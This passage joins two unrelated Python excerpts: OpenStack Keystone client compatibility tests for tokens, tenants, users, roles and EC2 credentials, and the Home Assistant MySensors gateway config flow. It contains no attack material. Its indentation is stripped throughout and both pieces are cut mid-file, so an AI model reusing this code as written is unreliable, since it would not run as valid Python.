from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
token = client.auth_token
token_client = self._client(token=token)
tenants = token_client.tenants.list()
self.assertEquals(tenants[0].id, self.tenant_bar['id'])
client.tokens.delete(token_client.auth_token)
self.assertRaises(client_exceptions.Unauthorized,
token_client.tenants.list)
def test_authenticate_no_password(self):
from keystoneclient import exceptions as client_exceptions
user_ref = self.user_foo.copy()
user_ref['password'] = None
self.assertRaises(client_exceptions.AuthorizationFailure,
self.get_client,
user_ref)
def test_authenticate_no_username(self):
from keystoneclient import exceptions as client_exceptions
user_ref = self.user_foo.copy()
user_ref['name'] = None
self.assertRaises(client_exceptions.AuthorizationFailure,
self.get_client,
user_ref)
def test_authenticate_disabled_tenant(self):
from keystoneclient import exceptions as client_exceptions
admin_client = self.get_client(admin=True)
tenant = {
'name': uuid.uuid4().hex,
'description': uuid.uuid4().hex,
'enabled': False,
}
tenant_ref = admin_client.tenants.create(
tenant_name=tenant['name'],
description=tenant['description'],
enabled=tenant['enabled'])
tenant['id'] = tenant_ref.id
user = {
'name': uuid.uuid4().hex,
'password': uuid.uuid4().hex,
'email': uuid.uuid4().hex,
'tenant_id': tenant['id'],
}
user_ref = admin_client.users.create(
name=user['name'],
password=user['password'],
email=user['email'],
tenant_id=user['tenant_id'])
user['id'] = user_ref.id
# password authentication
self.assertRaises(
client_exceptions.Unauthorized,
self._client,
username=user['name'],
password=user['password'],
tenant_id=tenant['id'])
# token authentication
client = self._client(
username=user['name'],
password=user['password'])
self.assertRaises(
client_exceptions.Unauthorized,
self._client,
token=client.auth_token,
tenant_id=tenant['id'])
# FIXME(ja): this test should require the "keystone:admin" roled
# (probably the role set via --keystone_admin_role flag)
# FIXME(ja): add a test that admin endpoint is only sent to admin user
# FIXME(ja): add a test that admin endpoint returns unauthorized if not
# admin
def test_tenant_create_update_and_delete(self):
from keystoneclient import exceptions as client_exceptions
tenant_name = 'original_tenant'
tenant_description = 'My original tenant!'
tenant_enabled = True
client = self.get_client(admin=True)
# create, get, and list a tenant
tenant = client.tenants.create(tenant_name=tenant_name,
description=tenant_description,
enabled=tenant_enabled)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = client.tenants.get(tenant_id=tenant.id)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = [t for t in client.tenants.list() if t.id == tenant.id].pop()
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
# update, get, and list a tenant
tenant_name = 'updated_tenant'
tenant_description = 'Updated tenant!'
tenant_enabled = False
tenant = client.tenants.update(tenant_id=tenant.id,
tenant_name=tenant_name,
enabled=tenant_enabled,
description=tenant_description)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = client.tenants.get(tenant_id=tenant.id)
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
tenant = [t for t in client.tenants.list() if t.id == tenant.id].pop()
self.assertEquals(tenant.name, tenant_name)
self.assertEquals(tenant.description, tenant_description)
self.assertEquals(tenant.enabled, tenant_enabled)
# delete, get, and list a tenant
client.tenants.delete(tenant=tenant.id)
self.assertRaises(client_exceptions.NotFound, client.tenants.get,
tenant.id)
self.assertFalse([t for t in client.tenants.list()
if t.id == tenant.id])
def test_tenant_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.delete,
tenant=uuid.uuid4().hex)
def test_tenant_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.get,
tenant_id=uuid.uuid4().hex)
def test_tenant_update_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.tenants.update,
tenant_id=uuid.uuid4().hex)
def test_tenant_list(self):
client = self.get_client()
tenants = client.tenants.list()
self.assertEquals(len(tenants), 1)
# Admin endpoint should return *all* tenants
client = self.get_client(admin=True)
tenants = client.tenants.list()
self.assertEquals(len(tenants), len(default_fixtures.TENANTS))
def test_invalid_password(self):
from keystoneclient import exceptions as client_exceptions
good_client = self._client(username=self.user_foo['name'],
password=self.user_foo['password'])
good_client.tenants.list()
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=self.user_foo['name'],
password='invalid')
def test_invalid_user_password(self):
from keystoneclient import exceptions as client_exceptions
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username='blah',
password='blah')
def test_change_password_invalidates_token(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
username = uuid.uuid4().hex
passwd = uuid.uuid4().hex
user = client.users.create(name=username, password=passwd,
email=uuid.uuid4().hex)
token_id = client.tokens.authenticate(username=username,
password=passwd).id
# authenticate with a token should work before a password change
client.tokens.authenticate(token=token_id)
client.users.update_password(user=user.id, password=uuid.uuid4().hex)
# authenticate with a token should not work after a password change
self.assertRaises(client_exceptions.Unauthorized,
client.tokens.authenticate,
token=token_id)
def test_disable_user_invalidates_token(self):
from keystoneclient import exceptions as client_exceptions
admin_client = self.get_client(admin=True)
foo_client = self.get_client(self.user_foo)
admin_client.users.update_enabled(user=self.user_foo['id'],
enabled=False)
self.assertRaises(client_exceptions.Unauthorized,
foo_client.tokens.authenticate,
token=foo_client.auth_token)
self.assertRaises(client_exceptions.Unauthorized,
self.get_client,
self.user_foo)
def test_token_expiry_maintained(self):
foo_client = self.get_client(self.user_foo)
orig_token = foo_client.service_catalog.catalog['token']
time.sleep(1.01)
reauthenticated_token = foo_client.tokens.authenticate(
token=foo_client.auth_token)
self.assertEquals(orig_token['expires'],
reauthenticated_token.expires)
def test_user_create_update_delete(self):
from keystoneclient import exceptions as client_exceptions
test_username = 'new_user'
client = self.get_client(admin=True)
user = client.users.create(name=test_username,
password='password',
email='user1@test.com')
self.assertEquals(user.name, test_username)
user = client.users.get(user=user.id)
self.assertEquals(user.name, test_username)
user = client.users.update(user=user,
name=test_username,
email='user2@test.com')
self.assertEquals(user.email, 'user2@test.com')
# NOTE(termie): update_enabled doesn't return anything, probably a bug
client.users.update_enabled(user=user, enabled=False)
user = client.users.get(user.id)
self.assertFalse(user.enabled)
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=test_username,
password='password')
client.users.update_enabled(user, True)
user = client.users.update_password(user=user, password='password2')
self._client(username=test_username,
password='password2')
user = client.users.update_tenant(user=user, tenant='bar')
# TODO(ja): once keystonelight supports default tenant
# when you login without specifying tenant, the
# token should be scoped to tenant 'bar'
client.users.delete(user.id)
self.assertRaises(client_exceptions.NotFound, client.users.get,
user.id)
# Test creating a user with a tenant (auto-add to tenant)
user2 = client.users.create(name=test_username,
password='password',
email='user1@test.com',
tenant_id='bar')
self.assertEquals(user2.name, test_username)
def test_user_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.create,
name=uuid.uuid4().hex,
password=uuid.uuid4().hex,
email=uuid.uuid4().hex,
tenant_id=uuid.uuid4().hex)
def test_user_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.get,
user=uuid.uuid4().hex)
def test_user_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.list,
tenant_id=uuid.uuid4().hex)
def test_user_update_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update,
user=uuid.uuid4().hex)
def test_user_update_tenant_404(self):
raise nose.exc.SkipTest('N/A')
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update,
user=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_user_update_password_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.update_password,
user=uuid.uuid4().hex,
password=uuid.uuid4().hex)
def test_user_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.users.delete,
user=uuid.uuid4().hex)
def test_user_list(self):
client = self.get_client(admin=True)
users = client.users.list()
self.assertTrue(len(users) > 0)
user = users[0]
self.assertRaises(AttributeError, lambda: user.password)
def test_user_get(self):
client = self.get_client(admin=True)
user = client.users.get(user=self.user_foo['id'])
self.assertRaises(AttributeError, lambda: user.password)
def test_role_get(self):
client = self.get_client(admin=True)
role = client.roles.get(role='keystone_admin')
self.assertEquals(role.id, 'keystone_admin')
def test_role_crud(self):
from keystoneclient import exceptions as client_exceptions
test_role = 'new_role'
client = self.get_client(admin=True)
role = client.roles.create(name=test_role)
self.assertEquals(role.name, test_role)
role = client.roles.get(role=role.id)
self.assertEquals(role.name, test_role)
client.roles.delete(role=role.id)
self.assertRaises(client_exceptions.NotFound,
client.roles.delete,
role=role.id)
self.assertRaises(client_exceptions.NotFound,
client.roles.get,
role=role.id)
def test_role_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.get,
role=uuid.uuid4().hex)
def test_role_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.delete,
role=uuid.uuid4().hex)
def test_role_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=uuid.uuid4().hex,
tenant=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=self.user_foo['id'],
tenant=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.roles_for_user,
user=uuid.uuid4().hex,
tenant=self.tenant_bar['id'])
def test_role_list(self):
client = self.get_client(admin=True)
roles = client.roles.list()
# TODO(devcamcar): This assert should be more specific.
self.assertTrue(len(roles) > 0)
def test_ec2_credential_crud(self):
client = self.get_client()
creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [])
cred = client.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [cred])
got = client.ec2.get(user_id=self.user_foo['id'], access=cred.access)
self.assertEquals(cred, got)
client.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
creds = client.ec2.list(user_id=self.user_foo['id'])
self.assertEquals(creds, [])
def test_ec2_credentials_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.create,
user_id=uuid.uuid4().hex,
tenant_id=self.tenant_bar['id'])
self.assertRaises(client_exceptions.NotFound,
client.ec2.create,
user_id=self.user_foo['id'],
tenant_id=uuid.uuid4().hex)
def test_ec2_credentials_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.delete,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.get,
user_id=uuid.uuid4().hex,
access=uuid.uuid4().hex)
def test_ec2_credentials_list_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.NotFound,
client.ec2.list,
user_id=uuid.uuid4().hex)
def test_ec2_credentials_list_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.list,
user_id=self.user_foo['id'])
def test_ec2_credentials_get_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
foo = self.get_client()
cred = foo.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.get,
user_id=self.user_foo['id'], access=cred.access)
foo.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
def test_ec2_credentials_delete_user_forbidden(self):
from keystoneclient import exceptions as client_exceptions
foo = self.get_client()
cred = foo.ec2.create(user_id=self.user_foo['id'],
tenant_id=self.tenant_bar['id'])
two = self.get_client(self.user_two)
self.assertRaises(client_exceptions.Forbidden, two.ec2.delete,
user_id=self.user_foo['id'], access=cred.access)
foo.ec2.delete(user_id=self.user_foo['id'], access=cred.access)
def test_service_create_and_delete(self):
from keystoneclient import exceptions as client_exceptions
test_service = 'new_service'
client = self.get_client(admin=True)
service = client.services.create(name=test_service,
service_type='test',
description='test')
self.assertEquals(service.name, test_service)
service = client.services.get(id=service.id)
self.assertEquals(service.name, test_service)
client.services.delete(id=service.id)
self.assertRaises(client_exceptions.NotFound, client.services.get,
id=service.id)
def test_service_list(self):
client = self.get_client(admin=True)
test_service = 'new_service'
service = client.services.create(name=test_service,
service_type='test',
description='test')
services = client.services.list()
# TODO(devcamcar): This assert should be more specific.
self.assertTrue(len(services) > 0)
def test_service_delete_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.services.delete,
id=uuid.uuid4().hex)
def test_service_get_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.services.get,
id=uuid.uuid4().hex)
def test_endpoint_create_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.endpoints.create,
region=uuid.uuid4().hex,
service_id=uuid.uuid4().hex,
publicurl=uuid.uuid4().hex,
adminurl=uuid.uuid4().hex,
internalurl=uuid.uuid4().hex)
def test_endpoint_delete_404(self):
# the catalog backend is expected to return Not Implemented
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.HTTPNotImplemented,
client.endpoints.delete,
id=uuid.uuid4().hex)
def test_admin_requires_adminness(self):
from keystoneclient import exceptions as client_exceptions
# FIXME(ja): this should be Unauthorized
exception = client_exceptions.ClientException
two = self.get_client(self.user_two, admin=True) # non-admin user
# USER CRUD
self.assertRaises(exception,
two.users.list)
self.assertRaises(exception,
two.users.get,
user=self.user_two['id'])
self.assertRaises(exception,
two.users.create,
name='oops',
password='password',
email='oops@test.com')
self.assertRaises(exception,
two.users.delete,
user=self.user_foo['id'])
# TENANT CRUD
self.assertRaises(exception,
two.tenants.list)
self.assertRaises(exception,
two.tenants.get,
tenant_id=self.tenant_bar['id'])
self.assertRaises(exception,
two.tenants.create,
tenant_name='oops',
description="shouldn't work!",
enabled=True)
self.assertRaises(exception,
two.tenants.delete,
tenant=self.tenant_baz['id'])
# ROLE CRUD
self.assertRaises(exception,
two.roles.get,
role='keystone_admin')
self.assertRaises(exception,
two.roles.list)
self.assertRaises(exception,
two.roles.create,
name='oops')
self.assertRaises(exception,
two.roles.delete,
role='keystone_admin')
# TODO(ja): MEMBERSHIP CRUD
# TODO(ja): determine what else todo
class KcMasterTestCase(CompatTestCase, KeystoneClientTests):
def get_checkout(self):
return KEYSTONECLIENT_REPO, 'master'
def test_tenant_add_and_remove_user(self):
client = self.get_client(admin=True)
client.roles.add_user_role(tenant=self.tenant_baz['id'],
user=self.user_two['id'],
role=self.role_useless['id'])
user_refs = client.tenants.list_users(tenant=self.tenant_baz['id'])
self.assert_(self.user_two['id'] in [x.id for x in user_refs])
client.roles.remove_user_role(tenant=self.tenant_baz['id'],
user=self.user_two['id'],
role=self.role_useless['id'])
user_refs = client.tenants.list_users(tenant=self.tenant_baz['id'])
self.assert_(self.user_two['id'] not in [x.id for x in user_refs])
def test_user_role_add_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=uuid.uuid4().hex,
user=self.user_foo['id'],
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=self.tenant_baz['id'],
user=uuid.uuid4().hex,
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.add_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=uuid.uuid4().hex)
def test_user_role_remove_404(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client(admin=True)
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=uuid.uuid4().hex,
user=self.user_foo['id'],
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=uuid.uuid4().hex,
role=self.role_useless['id'])
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=uuid.uuid4().hex)
self.assertRaises(client_exceptions.NotFound,
client.roles.remove_user_role,
tenant=self.tenant_baz['id'],
user=self.user_foo['id'],
role=self.role_useless['id'])
def test_tenant_list_marker(self):
client = self.get_client()
# Add two arbitrary tenants to user for testing purposes
for i in range(2):
tenant_id = uuid.uuid4().hex
tenant = {'name': 'tenant-%s' % tenant_id, 'id': tenant_id}
self.identity_api.create_tenant(tenant_id, tenant)
self.identity_api.add_user_to_tenant(tenant_id,
self.user_foo['id'])
tenants = client.tenants.list()
self.assertEqual(len(tenants), 3)
tenants_marker = client.tenants.list(marker=tenants[0].id)
self.assertEqual(len(tenants_marker), 2)
self.assertEqual(tenants[1].name, tenants_marker[0].name)
self.assertEqual(tenants[2].name, tenants_marker[1].name)
def test_tenant_list_marker_not_found(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, marker=uuid.uuid4().hex)
def test_tenant_list_limit(self):
client = self.get_client()
# Add two arbitrary tenants to user for testing purposes
for i in range(2):
tenant_id = uuid.uuid4().hex
tenant = {'name': 'tenant-%s' % tenant_id, 'id': tenant_id}
self.identity_api.create_tenant(tenant_id, tenant)
self.identity_api.add_user_to_tenant(tenant_id,
self.user_foo['id'])
tenants = client.tenants.list()
self.assertEqual(len(tenants), 3)
tenants_limited = client.tenants.list(limit=2)
self.assertEqual(len(tenants_limited), 2)
self.assertEqual(tenants[0].name, tenants_limited[0].name)
self.assertEqual(tenants[1].name, tenants_limited[1].name)
def test_tenant_list_limit_bad_value(self):
from keystoneclient import exceptions as client_exceptions
client = self.get_client()
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, limit='a')
self.assertRaises(client_exceptions.BadRequest,
client.tenants.list, limit=-1)
def test_roles_get_by_user(self):
client = self.get_client(admin=True)
roles = client.roles.roles_for_user(user=self.user_foo['id'],
tenant=self.tenant_bar['id'])
self.assertTrue(len(roles) > 0)
class KcEssex3TestCase(CompatTestCase, KeystoneClientTests):
def get_checkout(self):
return KEYSTONECLIENT_REPO, 'essex-3'
def test_tenant_add_and_remove_user(self):
client = self.get_client(admin=True)
client.roles.add_user_to_tenant(tenant_id=self.tenant_baz['id'],
user_id=self.user_two['id'],
role_id=self.role_useless['id'])
role_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
self.assert_(self.tenant_baz['id'] in [x.tenantId for x in role_refs])
# get the "role_refs" so we get the proper id, this is how the clients
# do it
roleref_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
for roleref_ref in roleref_refs:
if (roleref_ref.roleId == self.role_useless['id']
and roleref_ref.tenantId == self.tenant_baz['id']):
# use python's scope fall through to leave roleref_ref set
break
client.roles.remove_user_from_tenant(tenant_id=self.tenant_baz['id'],
user_id=self.user_two['id'],
role_id=roleref_ref.id)
role_refs = client.roles.get_user_role_refs(
user_id=self.user_two['id'])
self.assert_(self.tenant_baz['id'] not in
[x.tenantId for x in role_refs])
def test_roles_get_by_user(self):
client = self.get_client(admin=True)
roles = client.roles.get_user_role_refs(user_id='foo')
self.assertTrue(len(roles) > 0)
def test_role_list_404(self):
raise nose.exc.SkipTest('N/A')
def test_authenticate_and_delete_token(self):
raise nose.exc.SkipTest('N/A')
def test_user_create_update_delete(self):
from keystoneclient import exceptions as client_exceptions
test_username = 'new_user'
client = self.get_client(admin=True)
user = client.users.create(name=test_username,
password='password',
email='user1@test.com')
self.assertEquals(user.name, test_username)
user = client.users.get(user=user.id)
self.assertEquals(user.name, test_username)
user = client.users.update_email(user=user, email='user2@test.com')
self.assertEquals(user.email, 'user2@test.com')
# NOTE(termie): update_enabled doesn't return anything, probably a bug
client.users.update_enabled(user=user, enabled=False)
user = client.users.get(user.id)
self.assertFalse(user.enabled)
self.assertRaises(client_exceptions.Unauthorized,
self._client,
username=test_username,
password='password')
client.users.update_enabled(user, True)
user = client.users.update_password(user=user, password='password2')
self._client(username=test_username,
password='password2')
user = client.users.update_tenant(user=user, tenant='bar')
# TODO(ja): once keystonelight supports default tenant
# when you login without specifying tenant, the
# token should be scoped to tenant 'bar'
client.users.delete(user.id)
self.assertRaises(client_exceptions.NotFound, client.users.get,
user.id)
def test_user_update_404(self):
raise nose.exc.SkipTest('N/A')
def test_endpoint_create_404(self):
raise nose.exc.SkipTest('N/A')
def test_endpoint_delete_404(self):
raise nose.exc.SkipTest('N/A')
|
|
"""Config flow for MySensors."""
from __future__ import annotations
import os
from typing import Any
from awesomeversion import (
AwesomeVersion,
AwesomeVersionStrategy,
AwesomeVersionStrategyException,
)
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components.mqtt import (
DOMAIN as MQTT_DOMAIN,
valid_publish_topic,
valid_subscribe_topic,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
import homeassistant.helpers.config_validation as cv
from . import (
CONF_DEVICE,
CONF_RETAIN,
CONF_VERSION,
DEFAULT_BAUD_RATE,
DEFAULT_TCP_PORT,
DEFAULT_VERSION,
is_persistence_file,
)
from .const import (
CONF_BAUD_RATE,
CONF_GATEWAY_TYPE,
CONF_GATEWAY_TYPE_ALL,
CONF_GATEWAY_TYPE_MQTT,
CONF_GATEWAY_TYPE_SERIAL,
CONF_GATEWAY_TYPE_TCP,
CONF_PERSISTENCE_FILE,
CONF_TCP_PORT,
CONF_TOPIC_IN_PREFIX,
CONF_TOPIC_OUT_PREFIX,
DOMAIN,
ConfGatewayType,
)
from .gateway import MQTT_COMPONENT, is_serial_port, is_socket_address, try_connect
def _get_schema_common(user_input: dict[str, str]) -> dict:
"""Create a schema with options common to all gateway types."""
schema = {
vol.Required(
CONF_VERSION,
description={
"suggested_value": user_input.get(CONF_VERSION, DEFAULT_VERSION)
},
): str,
vol.Optional(CONF_PERSISTENCE_FILE): str,
}
return schema
def _validate_version(version: str) -> dict[str, str]:
"""Validate a version string from the user."""
version_okay = True
try:
AwesomeVersion(
version,
[AwesomeVersionStrategy.SIMPLEVER, AwesomeVersionStrategy.SEMVER],
)
except AwesomeVersionStrategyException:
version_okay = False
if version_okay:
return {}
return {CONF_VERSION: "invalid_version"}
def _is_same_device(
gw_type: ConfGatewayType, user_input: dict[str, Any], entry: ConfigEntry
) -> bool:
"""Check if another ConfigDevice is actually the same as user_input.
This function only compares addresses and tcp ports, so it is possible to fool it with tricks like port forwarding.
"""
if entry.data[CONF_DEVICE] != user_input[CONF_DEVICE]:
return False
if gw_type == CONF_GATEWAY_TYPE_TCP:
entry_tcp_port: int = entry.data[CONF_TCP_PORT]
input_tcp_port: int = user_input[CONF_TCP_PORT]
return entry_tcp_port == input_tcp_port
if gw_type == CONF_GATEWAY_TYPE_MQTT:
entry_topics = {
entry.data[CONF_TOPIC_IN_PREFIX],
entry.data[CONF_TOPIC_OUT_PREFIX],
}
return (
user_input.get(CONF_TOPIC_IN_PREFIX) in entry_topics
or user_input.get(CONF_TOPIC_OUT_PREFIX) in entry_topics
)
return True
class MySensorsConfigFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle a config flow."""
def __init__(self) -> None:
"""Set up config flow."""
self._gw_type: str | None = None
async def async_step_import(self, user_input: dict[str, Any]) -> FlowResult:
"""Import a config entry.
This method is called by async_setup and it has already
prepared the dict to be compatible with what a user would have
entered from the frontend.
Therefore we process it as though it came from the frontend.
"""
if user_input[CONF_DEVICE] == MQTT_COMPONENT:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_MQTT
else:
try:
await self.hass.async_add_executor_job(
is_serial_port, user_input[CONF_DEVICE]
)
except vol.Invalid:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_TCP
else:
user_input[CONF_GATEWAY_TYPE] = CONF_GATEWAY_TYPE_SERIAL
result: FlowResult = await self.async_step_user(user_input=user_input)
if errors := result.get("errors"):
return self.async_abort(reason=next(iter(errors.values())))
return result
async def async_step_user(
self, user_input: dict[str, str] | None = None
) -> FlowResult:
"""Create a config entry from frontend user input."""
schema = {vol.Required(CONF_GATEWAY_TYPE): vol.In(CONF_GATEWAY_TYPE_ALL)}
schema = vol.Schema(schema)
errors = {}
if user_input is not None:
gw_type = self._gw_type = user_input[CONF_GATEWAY_TYPE]
input_pass = user_input if CONF_DEVICE in user_input else None
if gw_type == CONF_GATEWAY_TYPE_MQTT:
# Naive check that doesn't consider config entry state.
if MQTT_DOMAIN in self.hass.config.components:
return await self.async_step_gw_mqtt(input_pass)
errors["base"] = "mqtt_required"
if gw_type == CONF_GATEWAY_TYPE_TCP:
return await self.async_step_gw_tcp(input_pass)
if gw_type == CONF_GATEWAY_TYPE_SERIAL:
return await self.async_step_gw_serial(input_pass)
return self.async_show_form(step_id="user", data_schema=schema, errors=errors)
async def async_step_gw_serial(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create config entry for a serial gateway."""
errors: dict[str, str] = {}
if user_input is not None:
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_SERIAL, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(
CONF_BAUD_RATE,
default=user_input.get(CONF_BAUD_RATE, DEFAULT_BAUD_RATE),
)
] = cv.positive_int
schema[
vol.Required(
CONF_DEVICE, default=user_input.get(CONF_DEVICE, "/dev/ttyACM0")
)
] = str
schema = vol.Schema(schema)
return self.async_show_form(
step_id="gw_serial", data_schema=schema, errors=errors
)
async def async_step_gw_tcp(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create a config entry for a tcp gateway."""
errors = {}
if user_input is not None:
if CONF_TCP_PORT in user_input:
port: int = user_input[CONF_TCP_PORT]
if not (0 < port <= 65535):
errors[CONF_TCP_PORT] = "port_out_of_range"
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_TCP, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(CONF_DEVICE, default=user_input.get(CONF_DEVICE, "127.0.0.1"))
] = str
# Don't use cv.port as that would show a slider *facepalm*
schema[
vol.Optional(
CONF_TCP_PORT, default=user_input.get(CONF_TCP_PORT, DEFAULT_TCP_PORT)
)
] = vol.Coerce(int)
schema = vol.Schema(schema)
return self.async_show_form(step_id="gw_tcp", data_schema=schema, errors=errors)
def _check_topic_exists(self, topic: str) -> bool:
for other_config in self._async_current_entries():
if topic == other_config.data.get(
CONF_TOPIC_IN_PREFIX
) or topic == other_config.data.get(CONF_TOPIC_OUT_PREFIX):
return True
return False
async def async_step_gw_mqtt(
self, user_input: dict[str, Any] | None = None
) -> FlowResult:
"""Create a config entry for a mqtt gateway."""
errors = {}
if user_input is not None:
user_input[CONF_DEVICE] = MQTT_COMPONENT
try:
valid_subscribe_topic(user_input[CONF_TOPIC_IN_PREFIX])
except vol.Invalid:
errors[CONF_TOPIC_IN_PREFIX] = "invalid_subscribe_topic"
else:
if self._check_topic_exists(user_input[CONF_TOPIC_IN_PREFIX]):
errors[CONF_TOPIC_IN_PREFIX] = "duplicate_topic"
try:
valid_publish_topic(user_input[CONF_TOPIC_OUT_PREFIX])
except vol.Invalid:
errors[CONF_TOPIC_OUT_PREFIX] = "invalid_publish_topic"
if not errors:
if (
user_input[CONF_TOPIC_IN_PREFIX]
== user_input[CONF_TOPIC_OUT_PREFIX]
):
errors[CONF_TOPIC_OUT_PREFIX] = "same_topic"
elif self._check_topic_exists(user_input[CONF_TOPIC_OUT_PREFIX]):
errors[CONF_TOPIC_OUT_PREFIX] = "duplicate_topic"
errors.update(
await self.validate_common(CONF_GATEWAY_TYPE_MQTT, errors, user_input)
)
if not errors:
return self._async_create_entry(user_input)
user_input = user_input or {}
schema = _get_schema_common(user_input)
schema[
vol.Required(CONF_RETAIN, default=user_input.get(CONF_RETAIN, True))
] = bool
schema[
vol.Required(
CONF_TOPIC_IN_PREFIX, default=user_input.get(CONF_TOPIC_IN_PREFIX, "")
)
] = str
schema[
vol.Required(
CONF_TOPIC_OUT_PREFIX, default=user_input.get(CONF_TOPIC_OUT_PREFIX, "")
)
] = str
schema = vol.Schema(schema)
return self.async_show_form(
step_id="gw_mqtt", data_schema=schema, errors=errors
)
@callback
def _async_create_entry(self, user_input: dict[str, Any]) -> FlowResult:
"""Create the config entry."""
return self.async_create_entry(
title=f"{user_input[CONF_DEVICE]}",
data={**user_input, CONF_GATEWAY_TYPE: self._gw_type},
)
def _normalize_persistence_file(self, path: str) -> str:
